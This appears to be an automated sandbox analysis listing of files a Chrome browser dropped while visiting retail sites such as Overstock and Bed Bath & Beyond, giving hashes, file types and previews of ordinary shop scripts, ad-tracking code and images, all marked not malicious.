                                                                                                                                                                                    MD5:5DFEA97A69D86F8D0AC11F1E442B42AE
                                                                                                                                                                                    SHA1:B0B7C8E751751F480D9D1B9C09D36138E14F7B1D
                                                                                                                                                                                    SHA-256:C70080425C7F3115D6F686BBF73A336D1DD283479C0357CFB14F7DBCEF374D15
                                                                                                                                                                                    SHA-512:357589765F913BCF77E0F7E60A073CDDB05ECCB6AFE355A46DA28412C8F13DC0E8B574EEF631CFC5A63EA93DD3D967FAFD1F25F4AD440E24EF9374DE2D074610
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://unpkg.com/tapcart-capture-kit@0.3.0/dist/embed.js
                                                                                                                                                                                    Preview:function noop() {.}.function assign(tar, src) {. for (const k in src). tar[k] = src[k];. return tar;.}.function is_promise(value) {. return value && typeof value === "object" && typeof value.then === "function";.}.function run(fn) {. return fn();.}.function blank_object() {. return /* @__PURE__ */ Object.create(null);.}.function run_all(fns) {. fns.forEach(run);.}.function is_function(thing) {. return typeof thing === "function";.}.function safe_not_equal(a, b) {. return a != a ? b == b : a !== b || (a && typeof a === "object" || typeof a === "function");.}.function is_empty(obj) {. return Object.keys(obj).length === 0;.}.function null_to_empty(value) {. return value == null ? "" : value;.}.let is_hydrating = false;.function start_hydrating() {. is_hydrating = true;.}.function end_hydrating() {. is_hydrating = false;.}.function upper_bound(low, high, key, value) {. while (low < high) {. const mid = low + (high - low >> 1);. if (key(mid) <= value) {. low = mid
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (19350), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):19350
                                                                                                                                                                                    Entropy (8bit):5.19688399030424
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:WzvtO/t2njZDw1QqyytHPjgdudPZVuQvhyx469dZm7gqCHfV+lS:EOl2njdw1QqyytHPjgdudPZVuIK4YZmu
                                                                                                                                                                                    MD5:EBA56CA07CC34448E0BD43C9D4157C8B
                                                                                                                                                                                    SHA1:84E6FEC79CA04C3A812EBB98106C0DB7B6F4E108
                                                                                                                                                                                    SHA-256:4FFB65B11C10E1E9A868C23BC1E39B4B091B6864387CD55278A10EC4BD663288
                                                                                                                                                                                    SHA-512:09FCA43B1D56D2307459CA27C379F3D4779C6AA9BADCA8FEE1BA36D7CD56C97F40CDA1AB14EC654E398DFFF15E562608FC2FF6EFEF396ADD47E9B7DEDC9AD319
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){var r,t,a,s;window._Shopify=window._Shopify||{},r=["Shopify.API.reportScroll"],a=function(e,t){var n,i,o;if(("undefined"!=typeof console&&null!==console?console.log:void 0)&&(("undefined"!=typeof ShopifyApp&&null!==ShopifyApp?ShopifyApp.debug:void 0)||("undefined"!=typeof ShopifyPOS&&null!==ShopifyPOS?ShopifyPOS.debug:void 0)||t)&&!window.Teaspoon){for(i=0,o=r.length;i<o;i++)if(n=r[i],0<e.indexOf(n))return;return console.log("ShopifyApp "+e)}},s=function(e){return("undefined"!=typeof console&&null!==console?console.warn:void 0)&&!window.Teaspoon?console.warn("ShopifyApp "+e):a(e,!0)},t=function(e){var t,n,i,o,r,a,s,l;if(!(e.document&&e.document.body&&e.navigator&&e.navigator.userAgent))return!1;if(!(-1!==(l=e.navigator.userAgent).search(/Shopify Mobile|Shopify POS|Shopify Ping/g)&&-1!==l.search("iOS")))return!1;for(o=e.document.createElement("style"),a="",r=/(\@media[^\{]*)print([^\{]*\{)/g,n=0;n<e.document.styleSheets.length;){for(s=e.document.styleSheets[n],i=0;i<s.cssRul
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 320 x 320, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):55053
                                                                                                                                                                                    Entropy (8bit):7.985001129159105
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:qXkE0M6K/ZnYQ83VEAF97PQKL386h2mX1B:mkE0gZnylN7Yasq1B
                                                                                                                                                                                    MD5:2A2373FCFE3B45EB5CFE145C73A43828
                                                                                                                                                                                    SHA1:AC15E026C75F6AB9ED8DD60F5EFB70417EE0EA82
                                                                                                                                                                                    SHA-256:B071137C352ED6DE46C61F558B7A4FEB93FA6505E3692C67D8E28C53885E5FCD
                                                                                                                                                                                    SHA-512:ED472EFE8109141EB6EBB6421D902875CFC4B48A832B192E969F5A8010B63A49F075046CE28CC511C293F5F2ED41EAB62E59B56F090828870603C862151C8193
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR...@...@............iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f.......x2......x2................0210....................0100....................@...........@.......n.1.....pHYs...%...%.IR$... .IDATx..w|.....wfvUV]..+..Z(/..B..!.j...B7..\06....I.-.B.....!.^B..7.Z..;s....;.Z..%....,....<{.s...A..m(....!.../.P]..........@.0.(.*.J..b.U..*....B)U....8.......T..7j.|.4...j.:..6c.MB.F.T........k..\).L....v..`.?...X_#|...R.....vA...Yl.m...0..i.n(P.s(x.........qQ3u1.7..I..H..*._@.y. ,..<@ l+..Y...F`..=...5......P..j...l..BP..0.u-..du.\.2.....;..M...."+{...*?...[B...R %.q....=.f......M........E..'..N.p.=.}&].c+!D..-.r.J.@...P).....S... m.B...m....`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):545
                                                                                                                                                                                    Entropy (8bit):4.972811279040273
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:t4Ix4Ff4oS0peb6/iHrgv2Vn2dlSxgRsJS3ewfRinKM77:t4I69XS0peW/igv2V2dlmggS3wnKMn
                                                                                                                                                                                    MD5:2BCF55B7A6BC310149E843449377B0CE
                                                                                                                                                                                    SHA1:743463645AA5ED1D244395EF248561FEB51B95AF
                                                                                                                                                                                    SHA-256:21AFF1C48B459F1853E033832ED9137558672180B4943F0822AFA9ADFE1B9DA8
                                                                                                                                                                                    SHA-512:6F148E4E80805B5FBA1460DCEF1EE420A7C09A594EC2B7EA1149A8A047FC12D3B8603D7C0ED5A1E7D9126CCBA4C4C7390E8F64492F14A271FFDB1FAB9D077D77
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 96 96" height="96" width="96">.<path fill="#D90023" d="M0 8C0 3.58172 3.58172 0 8 0H88C92.4183 0 96 3.58172 96 8V88C96 92.4183 92.4183 96 88 96H8C3.58172 96 0 92.4183 0 88V8Z"></path>.<path fill="white" d="M80 29.4855L63.8421 38.7427V56.6403L47.6853 66.3085L32.1579 57.2573V74.9488L47.6853 84L80 65.6915V29.4855ZM48.3147 29.6915L63.8421 38.7427V21.0512L48.3147 12L16 30.3085V66.5135L32.1568 57.2562V39.3597L48.3147 29.6915Z" clip-rule="evenodd" fill-rule="evenodd"></path>.</svg>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1495)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1597
                                                                                                                                                                                    Entropy (8bit):5.012272997831327
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:5tRr/iWIBotO/Afiqu7ihq0qfDlmRw7nAwEa+Sjgb0QM9xJGeedxNnp:XmuiyJWEwEaRcABGe6xNnp
                                                                                                                                                                                    MD5:B7D56C30CA4264AB2F5505AD6808C1DF
                                                                                                                                                                                    SHA1:70077A45797919FAA7D78DD86FE2DCF808E9DBB5
                                                                                                                                                                                    SHA-256:2EB89DEAF41C490FF58970D4793755ACFD9938C4B51349877CF08FC3637AA10F
                                                                                                                                                                                    SHA-512:36E3A86D9526411C6D52C9358945911DEB1F07A18575B9C1E7EA5A6A39451B717BFB3954B7E84BF4797FD873C69AE912E7598A01D7F0E8D95FFA1360C24BF9BD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(document.body.classList.contains("cc-animate-enabled"))if("IntersectionObserver"in window&&"MutationObserver"in window){const initAnimateOnScroll=()=>{const animatableElems=document.querySelectorAll("[data-cc-animate]:not(.cc-animate-init)");if(animatableElems.length>0){const intersectionObserver=new IntersectionObserver((entries,observer)=>{entries.forEach(entry=>{entry.isIntersecting&&!entry.target.classList.contains("cc-animate-in")&&(entry.target.classList.add("cc-animate-in"),observer.unobserve(entry.target))})});animatableElems.forEach(elem=>{elem.dataset.ccAnimateDelay&&(elem.style.animationDelay=elem.dataset.ccAnimateDelay),elem.dataset.ccAnimateDuration&&(elem.style.animationDuration=elem.dataset.ccAnimateDuration),elem.dataset.ccAnimate&&elem.classList.add(elem.dataset.ccAnimate),elem.classList.add("cc-animate-init"),intersectionObserver.observe(elem)})}},aosMinWidth=getComputedStyle(document.documentElement).getPropertyValue("--aos-min-width")||"0",mq=window.matchMedia(`(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):108069
                                                                                                                                                                                    Entropy (8bit):3.725869234959433
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:WXyuhxZazsWBvlms4pPP3R4IYHQI9tdkXs4pPP3R4IYHQI9tdkz:7hrhq
                                                                                                                                                                                    MD5:CE0B9D42D09F9C7DA3D4E819FC40F585
                                                                                                                                                                                    SHA1:CB0F2094B3DD1F86AA8A2494D441385FC9D03C79
                                                                                                                                                                                    SHA-256:30D76FF12CD090349C2FAB43811F43CF68EB397FA535B724FFA671540C96FBC8
                                                                                                                                                                                    SHA-512:E20889882645547E693639D05A972095D0F885D3111B3F978A21C92261882A31052B7568B6F0CABAB4D71CF3FC392A4DDB2797DAC8225464E49CA2FB75909DF2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10162024-MOPS-V3-Domestic_Desktop_9x5_A1_V2.svg
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="327" y="175" width="152.324" height="152" rx="76" fill="#832E00"/>.<path d="M384.676 215.188H388.078V224.758H384.676V223.238C383.864 224.429 382.448 225.103 380.738 225.103C377.957 225.103 376.454 223.324 376.454 220.819V215.188H379.857V220.595C379.857 221.838 380.565 222.564 381.86 222.564C383 222.564 383.95 222.028 384.676 220.854V215.188ZM397.832 225.103C396.087 225.103 394.74 224.429 393.894 223.341V228.212H390.491V215.188H393.894V216.588C394.74 215.517 396.087 214.826 397.832 214.826C400.837 214.826 402.91 216.795 402.91 219.973C402.91 223.134 400.837 225.103 397.832 225.103ZM396.882 217.434C395.725 217.434 394.671 217.831 393.911 218.798V221.13C394.671 222.098 395.725 222.495 396.882 222.495C398.678 222.495 399.68 221.562 399.68 219.973C399.68 218.367 398.678 217.434 396.882 217.434ZM416.321 221.959L416.891 224.188C416.027 224.775 414.68 225.12 413.523 225.12C411.346 225.1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4927), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4927
                                                                                                                                                                                    Entropy (8bit):5.835621260571221
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU7WCgi6sS:1DY0hf1bT47OIqWb1WWY6sS
                                                                                                                                                                                    MD5:ABDA13F52057580D0B9F35B1BFA4BF3E
                                                                                                                                                                                    SHA1:33A9E4471C4F05AEC0EF2C46CB6DA7EA41737659
                                                                                                                                                                                    SHA-256:1C2CEA70DEC209F0B5EE5F0C2D06F33B629CD4250B04DC7833A649B30F1835DB
                                                                                                                                                                                    SHA-512:9CAB2BF46325944755301B0C1B8901C897D0AB8658D655FD33E865949F90331DB346EB40EE50A1BB8C1028C54A832B679643000D2A52C24DEE715EF92D52D401
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1069816607/?random=1730294606280&cv=11&fst=1730294606280&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za200&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                    Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5932)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6029
                                                                                                                                                                                    Entropy (8bit):4.981564132368788
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:vpNC2czRoDbzMYTGX/eAF2WoIrKvCKx/+N89Hdty:vpNC2QOb6X/eAF2xsKh/s89Hdk
                                                                                                                                                                                    MD5:E354F57A89D39F7FC848E95A723C7A3C
                                                                                                                                                                                    SHA1:45A9B8988FE335D52E3E77FCD858D3EE505E5297
                                                                                                                                                                                    SHA-256:2523990069B690FB3EA381FD8B033CE08BF40FA099ECDAA17F329118B54AB7A6
                                                                                                                                                                                    SHA-512:B375E5D148ABC5893504DAA1AAFE440385D251FA010F2DBAF00FF840CA2837CB5F26E3F409AFD97C53169DCF47800DF5273F56CCA7E5DB6289AD1983CC467CE7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function loadScript(src){return new Promise((resolve,reject)=>{const s=document.createElement("script");s.src=src,s.onload=resolve,s.onerror=reject,document.body.appendChild(s)})}if(!customElements.get("cart-drawer-disclosure")){class CartDrawerDisclosure extends DetailsDisclosure{constructor(){super(),this.openBtn=this.querySelector("summary"),this.closeBtn=this.querySelector(".js-close"),this.overlay=document.getElementById("cart-drawer").querySelector(".overlay")}handleClick(evt){evt.target.matches(".js-close")&&this.close()}open(){this.overlay.classList.add("is-visible"),super.open(),trapFocus(this),this.clickHandler=this.clickHandler||this.handleClick.bind(this),this.keyupHandler=evt=>evt.key==="Escape"&&this.close(),this.addEventListener("click",this.clickHandler),this.addEventListener("keyup",this.keyupHandler),this.overlay.addEventListener("click",this.clickHandler)}close(){this.overlay.classList.remove("is-visible"),super.close(),removeTrapFocus(this.openBtn),this.removeEventL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2240)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2344
                                                                                                                                                                                    Entropy (8bit):4.8992937161367465
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:RfZzHEslT4z8UbBbXbvb6bSkbv6bx9lKrsh3mN9sfdFFs18A4qzq8n363Uzq8pwa:RhqJ9DTmekL6nliS2vh4kqIqmqywEv
                                                                                                                                                                                    MD5:2F90103D77DD2699BB7AA6446C82AB5F
                                                                                                                                                                                    SHA1:9491F3940C43EA1B337ED475BB56CD3FA63AFA83
                                                                                                                                                                                    SHA-256:57C160DCBA4926B20C80326642C769669DBF34F4AEFD88CF947EA345DD720505
                                                                                                                                                                                    SHA-512:BCDBC5F20F9231EAE4EAE7D0352733198431E3919C1C28D9EF8F961BDF18CC1D080F2EC762A6FDF9E3C2E8D01965A5D1CF9EC2E9B491696D63957A773C07FBED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(!customElements.get("toast-notification")){class ToastNotification extends HTMLElement{constructor(){super(),this.init()}getCookie(name){const parts=`; ${document.cookie}`.split(`; ${name}=`);return parts.length===2?parts.pop().split(";").shift():null}setCookie(name,value){document.cookie=`${name}=${value};path=/`}getDiscountFromCookies(){const discountCode=this.getCookie("discount_code");let dismissedToasts=this.getCookie("dismissed_toasts");return dismissedToasts=dismissedToasts?JSON.parse(dismissedToasts):[],!discountCode||dismissedToasts.includes(discountCode)?!1:(dismissedToasts.push(discountCode),this.setCookie("dismissed_toasts",JSON.stringify(dismissedToasts)),discountCode)}checkDiscount(cart,code){return this.checkCartDiscount(cart,code)?this.checkCartDiscount(cart,code):this.checkProductDiscount(cart,code)?this.checkProductDiscount(cart,code):!1}checkCartDiscount(cart,code){return cart.cart_level_discount_applications.some(discount=>discount.title===code)}checkProductDisco
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (9786), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9786
                                                                                                                                                                                    Entropy (8bit):5.447063987535362
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:8EWrgoY0f3LME9R/B79RrYO5skV74JPDNCE40YAFvr9vmMSCt5iaeK2/ELaRv:9e3LME9R/B79lN5skVkJPDN54hAZNd/S
                                                                                                                                                                                    MD5:D2095FDB1AC41E0EE04A2053A5E96797
                                                                                                                                                                                    SHA1:CA5442D2EEB54DB493025EEF0C633A0CCFD7B31B
                                                                                                                                                                                    SHA-256:E44B46F38D48DC7F37654CBE14433B525E945EB04999B40C7492127EADF63DDA
                                                                                                                                                                                    SHA-512:EE2248E48092959AA883166A9FF6A1D3C1B6FFC5A49876A4A803A784DF115F27C6022C58BFA06806DFBB15A8E17FDBF2DB32E181D3A2BF2D5C95144C272A6DD8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.612.chunk.e44b46f38d48dc7f37654cbe14433b525e945eb04999b40c7492127eadf63dda.js
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[612],{1420:function(n,r,t){t.r(r);var e=t(8081),u=t.n(e),a=t(3645),f=t.n(a)()(u());f.push([n.id,".cl-form-field-sm .cl-form-input {\n height: 32px;\n}\n.cl-form-field-lg .cl-form-input {\n height: 42px;\n}\n",""]),r.default=f},5218:function(n,r,t){t.r(r);var e=t(3379),u=t.n(e),a=t(7795),f=t.n(a),o=t(569),i=t.n(o),c=t(3565),l=t.n(c),d=t(9216),s=t.n(d),v=t(4589),p=t.n(v),h=t(1420),g={};for(var y in h)"default"!==y&&(g[y]=function(n){return h[n]}.bind(0,y));t.d(r,g);var m={};m.styleTagTransform=p(),m.setAttributes=l(),m.insert=i().bind(null,"head"),m.domAPI=f(),m.insertStyleElement=s();u()(h.default,m);r.default=h.default&&h.default.locals?h.default.locals:void 0},8422:function(n,r,t){t.r(r),t.d(r,{NIL:function(){return o.default},parse:function(){return d.default},stringify:function(){return l.default},v1:function(){return e.default},v3:function(){return u.default},v4:function(){return a.default},v5
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, was "z1m.js", last modified: Sat Jul 6 14:50:07 2024, from Unix, original size modulo 2^32 93431
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24291
                                                                                                                                                                                    Entropy (8bit):7.988940707515992
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:2tOLbozf1bVUHjHVgX5bKxjbFd9ot7/9gxYjn3a8MEKNsvdZIFTayidamQ0OzeXg:2Yg7ZVUDHV25cfFd9oks3a1svdZqTjRJ
                                                                                                                                                                                    MD5:90D1EEDED272FB37F53F86368BFF6DD2
                                                                                                                                                                                    SHA1:B97209BD8884B92DE6BC60556584032C9D069A96
                                                                                                                                                                                    SHA-256:DE19C9F177E51DF305F4B04A136D1B15AD070F0A69D36A19882EC2B4D9F7D8FA
                                                                                                                                                                                    SHA-512:A12F8071C4048F4D70B35CB79D36D9EBC1D6BA5D34FD962D9FD758ED4BC9288B96531A510DE475C8DED0A2500126C6C59050AA85112E5A19C1270D9D34D25236
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.....Y.f..z1m.js..k{.F.(......j...D.2.....,;.....(Z>....$h......oU....AR.'g..<y,......U..........l:.....a....<.........g..z{.z......O.n.<.R.x.....lQ.{..V+s...E..L.+..q62....aQ....@.~....:..0..N....;_dE.M..C...$Z....v?..2.KT...e..~.M....X.f.r...=..]2....}....`.........2M.<.5`...?...UL...........wg/...,u..O.,....(...R.....s..tY....KX...f...2..q...9S.bC;..k..b.....u.;/._d......P..o.?..n+..L.o.v.$pI.5.......U+..0....r..i...;w......]e.5.....#......\..Zi..N...r~e..[1.......q1.<D........zpp.vy.1..V(..v.....%...Y....7..<.7^.bD.Z.UY.S.6.bg#0.u..z...`...4..\...U...~..*.C..,.d..-../`c...iRXf..#hq.S)..._...I......HfF.k%.....b.C...........7..7..v...-.'..R....O..J.xwz6|{../._!..x}~y..R.5..]M.<6.u..oc.S.s..."..=.w-sC+..........G...w.$.............m...T.........S.........6..V..T.o..T.xFY..(.dw..'.b.B.m0.&..=&@..._.bJ...W.....4.k..W.4.E+8...j.V.t... .6.....<..a..W...Ul...B!,..i,j...b....M?.....],..F......8....&..n.i...A.Mt...,.4...3.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (19843), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):19843
                                                                                                                                                                                    Entropy (8bit):5.136893808309075
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:i5F+kuVMnhBwMe0qMvbTQoXR7E9GeEIALcnhBwMeaqh1bTQoXRQu9lxW/tWJcxas:i5x933p9qFMSgm58yle+
                                                                                                                                                                                    MD5:B9CFE972CF2284799D155BF66B82ECB5
                                                                                                                                                                                    SHA1:2EC817E6B3AEB87609F3F18E25A21FD30A13ED1B
                                                                                                                                                                                    SHA-256:FB3B732F9DD31956D34CBD679C3E0DEAC1B4B35DAB9F6FE8D92F3F6C63DF5DCE
                                                                                                                                                                                    SHA-512:5F77BE2B4505BC01A68469A1727576C02168AA5346862232490EF0917096D6B48419E2A5727D252A22943EC467810EBC4EC34E2A6CB88E8158F1946C9A93EAEE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0);if(f)return f(g,!0);var j=new Error("Cannot find module '"+g+"'");throw j.code="MODULE_NOT_FOUND",j}var k=c[g]={exports:{}};b[g][0].call(k.exports,function(a){var c=b[g][1][a];return e(c||a)},k,k.exports,a,b,c,d)}return c[g].exports}for(var f="function"==typeof require&&require,g=0;g<d.length;g++)e(d[g]);return e}return a}()({1:[function(a,b,c){var d=a("./lib"),e=a("./lib/loginlayer.js");b.exports={LLModule:d,LLExt:e}},{"./lib":3,"./lib/loginlayer.js":4}],2:[function(a,b,c){"use strict";var d="\n .login-layer-page-mask {\n position: absolute;\n top: 0;\n z-index: 99991;\n width: 100%;\n height: 7000px;\n background-color: rgba(0, 0, 0, 0.55);\n }\n\n .login-layer-page-mask .os-spinner {\n position: absolute;\n top: 50%;\n left: 50%;\n margin-top: -15px;\n margin-left: -15
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):123
                                                                                                                                                                                    Entropy (8bit):5.3800912085528525
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:EkVh37REBlJQ3ie/zZG8QwJN4S/xOGZ1oe:EouBlJ9gLpJNf/xV1oe
                                                                                                                                                                                    MD5:286C0AA3FD5E53F7BF0AE06ED50D34F0
                                                                                                                                                                                    SHA1:19FD9C4A03E521C0ADD9C7D288CEAECEECC20CEA
                                                                                                                                                                                    SHA-256:15AD4881C90FEE8C9FEFB413D20789C74884C35FA20624BCB2325C2C8FC01F6B
                                                                                                                                                                                    SHA-512:CA692B9EE8895C21C6E3AA60172BCBA24CF1DFFA7498DA6B966D6B7725E834F4530B1B3141940576C8069BD20BF8A2E8F6087E6E2FE5D4BB60803981FA00F9DB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:utag_handle_criteo_userid({"status":"OK","userid":"cZV2MF91Qlc1U0tVdGt1d0s5VzNpNWlKalM5Z25wdjRlZjA3Tk9RUlhxUEU0Vk5zJTNE"});
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1238
                                                                                                                                                                                    Entropy (8bit):6.3122716291458305
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:PTCIl/X2YlXWI2PU0v/E8W2+R0Jm1leP4IiV+pnue4EtY:uIl/Xflqv0Om1EgIignue41
                                                                                                                                                                                    MD5:828DB72461975622C7E8311FA8FEC0B3
                                                                                                                                                                                    SHA1:BF6B6CD9220CEF37392FFB1C37AEAB6DF47A3288
                                                                                                                                                                                    SHA-256:1CDFAF3756F4A67106B0183A7F5397CC7C143A2B38B5292E18CEE631E51B5844
                                                                                                                                                                                    SHA-512:17CE43A3CF150647D266D4A4D23EFA5FB432B19B7B84C0E4CAA323E3FAA6BB6371350EC388C847246E74CEC3F166866F0236DABF3661ECFBCB1F7CE95FB126FA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e45d1319-8ef4-4424-af39-745d17accb2a.jpg?v=1729322885&width=80
